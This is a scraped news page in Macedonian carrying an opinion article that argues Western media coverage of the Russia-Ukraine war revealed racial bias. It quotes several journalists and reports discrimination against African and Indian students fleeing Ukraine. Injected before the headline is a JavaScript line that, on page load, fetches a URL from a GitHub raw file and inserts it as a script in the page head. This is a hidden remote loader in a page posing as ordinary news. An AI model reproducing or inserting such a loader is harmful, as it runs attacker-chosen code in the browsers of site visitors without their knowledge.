;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Конфликтот помеѓу Русија и Украина ја обелодини западната расна супремација - Антропол
АктуелноИнтернационално

(Видео) Конфликтот помеѓу Русија и Украина ја обелодини западната расна супремација

Идејата дека расизмот е зад нас и дека западните либерални и демократски општества се тие што се залагаат за човечки права без разлика на боја на кожа и локација, повторно се покажува како лажна самоважност. Расизмот и западната супремација над остатокот од светот најотворено се демонстрира во западните медиуми преку известањата за конфликтот помеѓу Русија и Украина.

Како за почеток тука е наративот, споделен од германскиот канцелар Шолц, дека овој конфликт е најголемиот во Европа после Втората Светска Војна, целосно бришејќи скоро деценија од конфликти кои го следеа распадот на Југославија и страдањата на стотина илјади жртви од истиот.

Даниел Ханан, во Британскиот Телеграф пишува:

“Личат на нас. Затоа е шокантно… Војна не е веќе само нешто што се случува помеѓу сиромашни и далечни популации. Може на секој да му се случи.” На француска телевизија коментатор со слична изјава вели “Во 21 век сме, во Европски град, и имаме ракети како да сме во Ирак или Афганистан, замислете…”

Чарли Дагата известува за ЦБС (CBS) од Киев со “Украина, со сета почит, не е како Ирак или Афганистан, каде се води конфликт со децении… Ова е релативно цивилизиран, релативно Европски – Треба да ги бирам зборовите внимателно – град, каде не би очекувал или би се надевал дека вакво нешто може да се случи.” Украинскиот заменик обвинител, Давид Сакварелиџе за ББЦ (BBC) изјави “Многу е емотивно за мене, бидејќи гледам како се убиваат Европјани со плави очи и плава коса”.


Ова е само мал дел од отворениот расизам што го емитуваат западните медиуми и новинари. Се разбира тука е и самата Украина, каде африкански и индиски студенти се дискриминирани од страна на локалните власти. На неколку наврати африканските студенти им се оневозможува да бидат евакуирани и буквално се бркани од возови и автобуси. Слично искуство имаа и некои индиски студенти кои се омаловажувани и им е забрането да поминат контролни точки, оставајќи ги заглавени таму на минус температури.”